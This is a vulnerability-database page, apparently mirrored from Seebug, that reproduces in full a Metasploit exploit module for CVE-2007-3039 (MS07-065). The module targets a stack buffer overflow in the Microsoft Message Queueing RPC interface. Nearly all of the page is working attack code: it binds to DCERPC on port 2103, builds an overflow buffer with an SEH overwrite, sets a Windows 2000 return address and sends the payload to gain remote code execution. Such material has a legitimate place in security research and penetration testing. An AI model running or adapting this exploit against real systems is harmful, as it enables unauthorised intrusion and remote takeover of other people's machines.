Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Message Queueing Service DNS Name Path Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 27 Views

Microsoft Message Queueing Service DNS Name Path Overflow exploit leveraging stack buffer overflow in RPC interface with specific DNS name requiremen

Code

                                                ##
# $Id: ms07_065_msmq.rb 9929 2010-07-25 21:37:54Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft Message Queueing Service DNS Name Path Overflow',
			'Description'    => %q{
				This module exploits a stack buffer overflow in the RPC interface
			to the Microsoft Message Queueing service. This exploit requires
			the target system to have been configured with a DNS name and
			for that name to be supplied in the 'DNAME' option. This name does
			not need to be served by a valid DNS server, only configured on
			the target machine.

			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9929 $',
			'References'     =>
				[
					[ 'CVE', '2007-3039'],
					[ 'OSVDB', '39123'],
					[ 'MSB', 'MS07-065'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e\xff",
					'StackAdjustment' => -3500,

				},
			'Targets'        =>
				[
					[
						'Windows 2000 Server English',
						{
							'Platform' => 'win',
							'Ret'      => 0x75022ac4 # ws2help - pop/pop/ret
						},
					],
				],
			'DisclosureDate' => 'Dec 11 2007',
			'DefaultTarget' => 0))

		# Change the default port values to point at MSMQ
		register_options(
			[
				Opt::RPORT(2103),
				OptString.new('DNAME',  [ true,  "The DNS hostname of the target" ]),
			], self.class)
	end

	def autofilter
		# Common vulnerability scanning tools report port 445/139
		# due to how they test for the vulnerability. Remap this
		# back to 2103 for automated exploitation

		rport = datastore['RPORT'].to_i
		if ( rport == 445 or rport == 139 )
			datastore['RPORT'] = 2103
		end

		# The fqdn is required to exploit this bug
		if (not datastore['DNAME'])
			# XXX automatically determine the hostname
			return false
		end

		true
	end

	def exploit

		connect
		print_status("Trying target #{target.name}...")

		handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		dname = datastore['DNAME']

		boom = rand_text_alphanumeric(4096)

		hname,domain = dname.split(".")

		if(not domain)
			print_status("The DNAME parameter specified is not valid.")
			print_status("This option must be the fully-qualified domain name of the target (as it has been configured).")
			return
		end

		off = 310 - (hname.length * 2)

		seh = generate_seh_payload(target.ret)
		boom[off, seh.length] = seh

		buff  = Rex::Text.to_unicode("#{dname}\\")
		buff << boom
		buff << "\x00\x00"

		# Data alignment
		while(buff.length % 4 != 0)
			buff << "\x00"
		end

		stubdata =
			NDR.long(1) +                                           # [in] long arg_1,
			NDR.UnicodeConformantVaryingStringPreBuilt(buff) +      # [in][string] wchar_t * arg_2,
			NDR.long(0) * 5                                         # ... fields we can ignore

		print_status('Sending exploit...')

		begin
			response = dcerpc.call(6, stubdata)

			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
				case dcerpc.last_response.stub_data
				when "\x14\x00\x0e\xc0"
					print_error("Error: The wrong value has been supplied for the DNAME parameter")
					print_error("This value must be the fully-qualified domain name of the target")
					print_error("Many systems have no FQDN configured and cannot be exploited")
				else
					print_status("An unknown response was received from the server:")
					print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0])
				end
			end
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
			print_status("No response from the DCERPC service (this is usually a good thing).")
		end

		handler
		disconnect
	end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
microsoftmessage queueing servicestack buffer overflowrpc interfacedns namedns name pathfully-qualified domain namevulnerabilityexploitremote code executionwindows 2000 server englishcve-2007-3039osvdb-39123ms07-065dec 11 2007
27